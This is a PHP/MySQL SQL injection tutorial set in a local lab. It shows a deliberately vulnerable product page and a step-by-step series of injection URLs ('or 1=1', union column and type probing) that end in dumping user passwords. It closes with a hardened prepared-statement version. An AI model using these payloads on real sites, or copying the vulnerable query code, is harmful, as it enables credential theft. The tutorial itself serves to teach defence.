This article walks through a complete PHP SQL injection example; it is shared here for anyone who needs a reference.

I hope it helps. Many PHP developers run into problems and bottlenecks as they advance, and lose their sense of direction from writing too much business code. I have collected some material covering, among other things: distributed architecture, high scalability, high performance, high concurrency, server performance tuning, TP6, Laravel, YII2, Redis, Swoole, Swoft, Kafka, MySQL optimization, shell scripting, Docker, microservices, Nginx, etc.

Having learned some SQL injection techniques, here is a simple hands-on exercise for SQL injection in PHP + MySQL.

First, look at the two MySQL tables.

User record table:

CREATE TABLE `php_user` (
  `id` int(11) NOT NULL auto_increment,
  `username` varchar(20) NOT NULL default '',
  `password` varchar(20) NOT NULL default '',
  `userlevel` char(2) NOT NULL default '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3;

INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');

Product record table:

CREATE TABLE `php_product` (
  `id` int(11) NOT NULL auto_increment,
  `name` varchar(100) NOT NULL default '',
  `price` float NOT NULL default '0',
  `img` varchar(200) NOT NULL default '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3;

INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');


The file below, show_product.php, displays the product list. The SQL injection exploits the way this file builds its SQL statement.

<?php
$conn = mysql_connect("localhost", "root", "root");
if (!$conn) {
    echo "Database connection error";
    exit;
}
if (!mysql_select_db("phpsql")) {
    echo "Error selecting database" . mysql_error();
    exit;
}

$tempID = $_GET['id'];
if ($tempID <= 0 || !isset($tempID)) $tempID = 1;
// $tempID is interpolated straight into the query string: this is the injection point
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.'<br>';

$result = mysql_query($sql);
if (!$result) {
    echo "Query error" . mysql_error();
    exit;
}
if (mysql_num_rows($result) == 0) {
    echo "No query result";
    exit;
}
while ($row = mysql_fetch_assoc($result)) {
    echo 'ID:'.$row["id"].'<br>';
    echo 'name:'.$row["name"].'<br>';
    echo 'price:'.$row["price"].'<br>';
    echo 'image:'.$row["img"].'<br>';
}
?>

$sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID comes straight from $_GET, so we can craft the value of this variable for SQL injection.

Construct the following URLs in turn:

1. http://localhost/phpsql/index.php?id=1

You get the following output:

SELECT * FROM php_product WHERE id =1

// Product record with ID 1
ID:1
name:name_1
price:12.2
image:images/name_1.jpg

2. http://localhost/phpsql/index.php?id=1 or 1=1

You get the following output:

SELECT * FROM php_product WHERE id =1 or 1=1

// Two product records are listed
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:2
name:name_2
price:35.25
image:images/name_2.jpg

Both URL 1 and URL 2 return product data, which shows that the injected SQL statement was executed successfully.

3. Determine the number of fields in the table

http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

You get the following output:

SELECT * FROM php_product WHERE id =1 union select 1,1,1,1

// The row from the union select shows 1 in every field. A union only succeeds when both SELECTs return the same number of columns, so four values returning without an error means the table has four fields.
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:1
name:1
price:1
image:1

4. Determine the type of each table field

http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

You get the following output:

SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:0
name:A
price:0
image:A

In the second record, a field that comes back as A has a type compatible with the value constructed in the union query; char(65) is the string 'A'. From this you can see that the name and image fields are both strings.

5. We get what we are after:

http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

You get the following output:

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

// Two user records are output: name is the user name, image is the user password.
ID:1
name:seven
price:1
image:seven_pwd
ID:1
name:swons
price:1
image:swons_pwd

Note that id=10000 in the URL is not meant to fetch product information; it is chosen so that only the results of the following union query are returned. In real cases the ID value will differ.

The username and password in the union must be placed in positions 2 and 4 so that they line up with the columns of the preceding SELECT; this is a characteristic of union queries.

Remark:

This simple injection method is quite context-specific; real cases are more complicated than this, but the principle is the same.
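The defence is to stop interpolating $_GET['id'] into the query string. The following is an added example, not the article's own code: show_product.php rewritten with PDO prepared statements and integer validation; the DSN, account name and password are placeholders.

```php
<?php
// Hardened show_product.php (added example, not the article's own code).
// Connection details are placeholders; use a least-privilege DB account, not root.
$dsn  = 'mysql:host=localhost;dbname=phpsql;charset=utf8mb4';
$user = 'phpsql_reader';   // placeholder
$pass = 'CHANGE_ME';       // placeholder

// 1. Validate the input as a positive integer before it goes anywhere near SQL.
//    "1 or 1=1" and "1 union select ..." are rejected here and fall back to 1.
$tempID = filter_var($_GET['id'] ?? '', FILTER_VALIDATE_INT,
    ['options' => ['min_range' => 1]]);
if ($tempID === false) {
    $tempID = 1;   // same default as the original page
}

try {
    $pdo = new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,  // server-side prepared statements
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);

    // 2. The query text is constant; the value is sent as a bound parameter,
    //    so no input can change the statement's structure (no extra "union").
    $stmt = $pdo->prepare('SELECT id, name, price, img FROM php_product WHERE id = :id');
    $stmt->bindValue(':id', $tempID, PDO::PARAM_INT);
    $stmt->execute();
    $rows = $stmt->fetchAll();
} catch (PDOException $e) {
    // 3. Log the real error server-side; never echo the SQL or the driver error to the client.
    error_log('show_product: ' . $e->getMessage());
    http_response_code(500);
    echo 'Query error';
    exit;
}

if (count($rows) === 0) {
    echo 'No query result';
    exit;
}

// 4. Escape output so stored data cannot inject HTML into the page either.
foreach ($rows as $row) {
    foreach (['id' => 'ID', 'name' => 'name', 'price' => 'price', 'img' => 'image'] as $col => $label) {
        echo $label . ':' . htmlspecialchars((string)$row[$col], ENT_QUOTES, 'UTF-8') . '<br>';
    }
}
```

With this version the values used in steps 2 to 5 fail FILTER_VALIDATE_INT and fall back to product 1, and even a value that passes validation can only ever be compared against id.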
